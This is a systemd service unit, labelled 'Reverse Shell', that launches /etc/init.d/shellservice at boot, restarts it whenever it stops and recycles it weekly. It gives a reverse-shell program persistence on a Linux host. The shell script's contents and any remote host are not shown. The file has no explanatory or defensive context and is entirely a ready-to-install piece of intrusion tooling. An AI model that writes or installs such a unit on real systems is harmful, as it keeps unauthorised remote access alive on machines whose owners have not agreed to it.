[Unit]
Description=Reverse Shell
After=network.target

[Service]
Type=simple
ExecStart=/etc/init.d/shellservice
KillSignal=SIGTERM
KillMode=process
Restart=always
RuntimeMaxSec=604800

[Install]
WantedBy=multi-user.target
